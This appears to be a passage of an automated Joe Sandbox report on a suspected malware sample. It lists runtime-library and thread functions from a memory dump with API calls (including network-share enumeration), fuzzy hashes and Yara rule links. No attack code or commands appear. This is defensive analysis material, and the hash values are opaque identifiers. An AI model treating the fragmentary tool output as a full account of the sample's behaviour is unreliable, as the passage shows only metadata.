                                                                                                                                                    • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                                                                                                                                    • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                                                                    • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00427B0B Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                                                                                      • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00427B16,00000000,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,00000000,00000000), ref: 00427AE6
                                                                                                                                                      • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2427264223-0
                                                                                                                                                    • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                                                                    • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                                                                                                                                                    • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                                                                    • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004118C5 Relevance: 2.5, APIs: 2, Instructions: 21COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004118DD
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 004118E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseFreeHandleVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2443081362-0
                                                                                                                                                    • Opcode ID: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
                                                                                                                                                    • Instruction ID: a75cf17640dcbe18a091e0aebb8a692561bc66dfcc2ddf1384dfcaf55dfbf141
                                                                                                                                                    • Opcode Fuzzy Hash: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
                                                                                                                                                    • Instruction Fuzzy Hash: D1E08636B415049BC7209B99ECC0B9DB374F785720F20437AD919733D047352D028A58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00416950 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004169DF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 120817956-0
                                                                                                                                                    • Opcode ID: e228db8f2929126c3b1913005bb93d35ef70577a56d5a0348c895a46b4dbfa9c
                                                                                                                                                    • Instruction ID: aa06b8048d3bf760f527e7d0bbb9ad0a08af858ba63749c6f8d7f01112261dfe
                                                                                                                                                    • Opcode Fuzzy Hash: e228db8f2929126c3b1913005bb93d35ef70577a56d5a0348c895a46b4dbfa9c
                                                                                                                                                    • Instruction Fuzzy Hash: E731E3B2A006059BCB20DF68C5816AEB7F9EF45750F21823FE856D7740DB38DD448BA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00416760 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004167E6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 120817956-0
                                                                                                                                                    • Opcode ID: e14d4706ebd2937f549925ab355345f0cc1dac9e10c7ad741e7fc5df18ade2da
                                                                                                                                                    • Instruction ID: efb258ddcfae47249c3acbfcaa5a8e986a9cbccba7edf1416c99c2e95f316cd5
                                                                                                                                                    • Opcode Fuzzy Hash: e14d4706ebd2937f549925ab355345f0cc1dac9e10c7ad741e7fc5df18ade2da
                                                                                                                                                    • Instruction Fuzzy Hash: B83126B1A016019FDB24DF29C5807AEBBF4EB40364F104A2EE426977C0D738DA80C7A6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00416570 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004165C5
                                                                                                                                                      • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 657562460-0
                                                                                                                                                    • Opcode ID: f435e59981ddbbd5e7f20df7de0e78d9e90dcc99dfbaf1614d1af27faf295db4
                                                                                                                                                    • Instruction ID: 5021f87c270b400a587bd724d9b61bde01bf534475f8b0cbfe068d44a909a5c2
                                                                                                                                                    • Opcode Fuzzy Hash: f435e59981ddbbd5e7f20df7de0e78d9e90dcc99dfbaf1614d1af27faf295db4
                                                                                                                                                    • Instruction Fuzzy Hash: A72124B5A00115DBCB14DF5CD981B9ABFA9EF45700F04822AEC058B348D738EA14CBE5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412840 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00413C40: _memset.LIBCMT ref: 00413C83
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,?,00000000,00000000,?), ref: 004128AA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2800726579-0
                                                                                                                                                    • Opcode ID: f52005a88d20f81000d550c36347818cd6b6cdbe6dba65ade1f51297c6f09db4
                                                                                                                                                    • Instruction ID: 77d5c0c78108e6bd7b696174a76f34ed3b4c8b07ae2fa23de187fb57fd92ed49
                                                                                                                                                    • Opcode Fuzzy Hash: f52005a88d20f81000d550c36347818cd6b6cdbe6dba65ade1f51297c6f09db4
                                                                                                                                                    • Instruction Fuzzy Hash: 9B11D371A00219BBDB11DF59CD41BDFBBA8EF01714F10422AF914A72C0C7BD99558BDA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041CC50 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                    • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0041CC83
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 657562460-0
                                                                                                                                                    • Opcode ID: de2def72106617bd751837f4368c798c607475e2aba36bab134435c0d11de50f
                                                                                                                                                    • Instruction ID: 52da3c53c07101cb0fed2dfe03d77d14ca015ab54627e4d196b0d3cf544a0d43
                                                                                                                                                    • Opcode Fuzzy Hash: de2def72106617bd751837f4368c798c607475e2aba36bab134435c0d11de50f
                                                                                                                                                    • Instruction Fuzzy Hash: 9AE026303803049BEB08DE12C890ABB7755DF92740B04803EAC0E8B361FA34DD04D7E9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041FA10 Relevance: 1.5, APIs: 1, Instructions: 19threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 0041FA25
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                    • Opcode ID: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
                                                                                                                                                    • Instruction ID: 74150d4eedde67828055b261a2b9f98274f0c47e32cd20f87c2cefabb50f2d8a
                                                                                                                                                    • Opcode Fuzzy Hash: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
                                                                                                                                                    • Instruction Fuzzy Hash: F1D05E322883147BE3140A9AAC06F867AC88B15B20F00403AB609DA1C0D9A1A8108A9C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041FD80 Relevance: 1.5, APIs: 1, Instructions: 18windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00410BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
                                                                                                                                                    • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 0041FDA4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumMessageOpenSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1835186980-0
                                                                                                                                                    • Opcode ID: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
                                                                                                                                                    • Instruction ID: f1b321f5059a27c682919cb5e20fd2d447803ac3e15b06371c74c2023cac73f2
                                                                                                                                                    • Opcode Fuzzy Hash: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
                                                                                                                                                    • Instruction Fuzzy Hash: 27E02B311043406AD32097A4DC01F82BBC49F18728F00C81EF7CA6B9C1C5F1B04487ED
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041FDC0 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00529230), ref: 0041FDD6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                    • Opcode ID: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
                                                                                                                                                    • Instruction ID: 36d07be7825d0dd215c2e58fd0e5fada4a3bc662417c17551b787912ef620d2a
                                                                                                                                                    • Opcode Fuzzy Hash: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
                                                                                                                                                    • Instruction Fuzzy Hash: 6FD012753C9305B7E7180BA6BC47F593A989B29B00F504036F60DD92D0DAB1F4509A5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004220B6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fsopen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3646066109-0
                                                                                                                                                    • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                                                    • Instruction ID: 292279633ce522dfb3aa62ab9f23dea9a591004ce3b356b458beb681742a1975
                                                                                                                                                    • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                                                    • Instruction Fuzzy Hash: FDB0927254021C77CF012E82EC02A493B199B60764F448021FB1C181B1E6BBE66496C9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _doexit.LIBCMT ref: 00427F47
                                                                                                                                                      • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00000000,00000001,00000000,?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E5B
                                                                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E6C
                                                                                                                                                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E85
                                                                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E95
                                                                                                                                                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E9B
                                                                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427EB1
                                                                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427EBC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2158581194-0
                                                                                                                                                    • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                    • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                                                                                    • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                    • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00420FDD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wfsopen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 197181222-0
                                                                                                                                                    • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                                                    • Instruction ID: 060863096896a5b816ca94ba1531ddaea04f54b188c1fa908ac11e743c0bd32b
                                                                                                                                                    • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                                                    • Instruction Fuzzy Hash: 1EB0927254020C77CE012A82EC02A497B199B516A4F408021FB0C18571A677A6A09A89
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412900 Relevance: 1.3, APIs: 1, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00412966
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                    • Opcode ID: 3083106c52cca49195eafaad81dd10d3becbaf549cad33685b2291d716977e0e
                                                                                                                                                    • Instruction ID: 3b43283c781d39060a285e1a990033b4cd03b7dd602a36c1420ec248ee7b7319
                                                                                                                                                    • Opcode Fuzzy Hash: 3083106c52cca49195eafaad81dd10d3becbaf549cad33685b2291d716977e0e
                                                                                                                                                    • Instruction Fuzzy Hash: 0411B171A00219EBDF00DF59DC41BDFBBA8EF05718F00452AF819A7280D7BE99558BDA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 004382A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _wcscmp.LIBCMT ref: 004382B9
                                                                                                                                                    • _wcscmp.LIBCMT ref: 004382CA
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale_wcscmp
                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                    • API String ID: 1351282208-711371036
                                                                                                                                                    • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                                    • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                                                                                    • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                                    • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00419E70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
